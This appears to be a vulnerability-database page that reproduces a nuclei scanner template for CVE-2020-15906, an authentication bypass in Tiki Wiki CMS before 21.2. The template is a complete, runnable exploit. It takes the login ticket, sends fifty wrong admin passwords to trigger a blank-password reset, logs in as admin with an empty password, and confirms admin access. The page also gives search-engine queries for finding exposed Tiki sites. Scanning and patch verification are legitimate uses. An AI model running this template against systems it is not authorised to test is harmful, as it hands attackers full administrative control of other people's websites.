Lucene search
K

Tiki Wiki CMS GroupWare - Authentication Bypass

🗓️ 03 Jul 2026 03:01:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 20 Views

Tiki Wiki CMS before 21.2 allows admin password reset to blank after multiple failed logins.

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
Tiki Authentication Bypass Vulnerability
25 Oct 202000:00
cnvd
Check Point Advisories
Tiki Wiki CMS Authentication Bypass (CVE-2020-15906)
25 Nov 202000:00
checkpoint_advisories
CVE
CVE-2020-15906
22 Oct 202017:26
cve
Cvelist
CVE-2020-15906
22 Oct 202017:26
cvelist
GithubExploit
Exploit for Improper Restriction of Excessive Authentication Attempts in Tiki
23 Jul 202009:20
githubexploit
Exploit DB
Tiki Wiki CMS Groupware 21.1 - Authentication Bypass
21 Oct 202000:00
exploitdb
NVD
CVE-2020-15906
22 Oct 202018:15
nvd
Packet Storm
Tiki Wiki CMS Groupware 21.1 Authentication Bypass
21 Oct 202000:00
packetstorm
Prion
Default credentials
22 Oct 202018:15
prion
Positive Technologies
PT-2020-14703 · Tiki · Tiki
22 Oct 202000:00
ptsecurity
Rows per page
id: CVE-2020-15906

info:
  name: Tiki Wiki CMS GroupWare - Authentication Bypass
  author: JeonSungHyun[nukunga],gy741,oIfloraIo,nechyo,harksu
  severity: critical
  description: |
    tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts.
  impact: |
    Unauthenticated attackers can trigger 50 failed login attempts to reset the admin password to blank, gaining complete administrative access to the Tiki Wiki CMS and all its content.
  remediation: |
    Upgrade to Tiki Wiki CMS version 21.2 or later.
  reference:
    - https://packetstormsecurity.com/files/159663/Tiki-Wiki-CMS-Groupware-21.1-Authentication-Bypass.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-15906
    - https://github.com/Z0fhack/Goby_POC
    - https://github.com/bakery312/Vulhub-Reproduce
    - https://github.com/20142995/Goby
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-15906
    cwe-id: CWE-307
    epss-score: 0.27362
    epss-percentile: 0.97816
    cpe: cpe:2.3:a:tiki:tiki:*:*:*:*:*:*:*:*
  metadata:
    vendor: tiki
    product: tiki
    shodan-query: title:"Tiki Wiki CMS"
    fofa-query: title="Tiki Wiki CMS"
    google-query: intitle:"Tiki Wiki CMS
  tags: packetstorm,cve,cve2020,tiki,wiki,auth-bypass,vuln

http:
  - raw:
      - |
        GET /tiki-login_scr.php HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: ticket1
        internal: true
        group: 1
        regex:
          - 'class="ticket" name="ticket" value="(.*)"'

  - raw:
      - |
        POST /tiki-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/tiki-login_scr.php

        ticket={{ticket1}}&user=admin&pass={{attempt}}&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n

    payloads:
      attempt:
        - nkQ0yYzgF5Er
        - P5UdGflH48W3
        - xFq7vKNLmhZp
        - 8zKtGnh4dW5R
        - CfXp2VbQz8Er
        - Lh3K6vPzM9Xn
        - bG4RxHpY2MdQ
        - 7zNtKh3WqF5L
        - Y8rQ2GpLx9Kn
        - C7KzLmP5X9Vh
        - v3LdX8GmQ5Kn
        - W4NzX6PqL3Ft
        - Q5GhY2VrX7Jk
        - r9KdL4PhY6Gm
        - 8XjVq5LhZ2Kr
        - L5WnQ9KzY8Pr
        - M2XdL5GrY9Kh
        - N6YzP8WkL5Xt
        - G7JqX5VbM2Kp
        - H4PrX8LkY6Gm
        - J5LhY2VqX9Kr
        - 8GrX5NqL2KhY
        - K4WnY9PzM8Xt
        - Q2XkL5PrY8Vh
        - 9JhL4VqX5GrM
        - N2XdY5PqL9Kh
        - W4LhY8KzM5Xt
        - G5JqX2VrY9Kp
        - H9PrL5XkY2Gm
        - L8WnX5KzY9Pr
        - M4XkY2LqV5Gt
        - N5XdL9PqY8Kr
        - P8XnL5VrY2Kh
        - Q4JqX9LhY5Gr
        - V7LkX5PrY2Gt
        - L2WnY9KzX8Pr
        - M9XdL5PqY4Kh
        - N8LhY2VqX5Gr
        - Q7XkL5PrY9Gm
        - X4LhY8WnM5Kp
        - G2JqL5VrY9Kt
        - H7PrX8KzY2Gm
        - J4LhY5VqX9Kr
        - N9XkY2LqP5Gt
        - W8LhY5PrX2Kz
        - G4JqL5XkY9Vr
        - P5WnY2KzL8Gt
        - M7XkY9LhP2Gr
        - Q2JqL5VrY8Kh
        - 2JqL5VrY8Kh
    attack: batteringram
    threads: 50

  - raw:
      - |
        GET /tiki-login_scr.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /tiki-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/tiki-login.php

        ticket={{ticket2}}&user=admin&pass=&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n

    extractors:
      - type: regex
        part: body_1
        name: ticket2
        internal: true
        group: 1
        regex:
          - 'class="ticket" name="ticket" value="(.*)"'

  - raw:
      - |
        GET /tiki-index.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "System Menu"
          - "Home"
          - "Search"
          - "Wiki"
          - "File Galleries"
          - "Settings"
        condition: and

      - type: word
        words:
          - "Show on admin log-in"
          - "Tiki Setup"
        condition: and
# digest: 4b0a0048304602210081cb80d4856e5d2d706e51480c90afedbb156987c646f4b928ed41b2e70e0fcb022100b824594764c4da0be148b03f9c2cd0a0ca4a277d6070062b7f6366dba9f504ee:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 27.5
CVSS 3.19.8
EPSS0.27362
20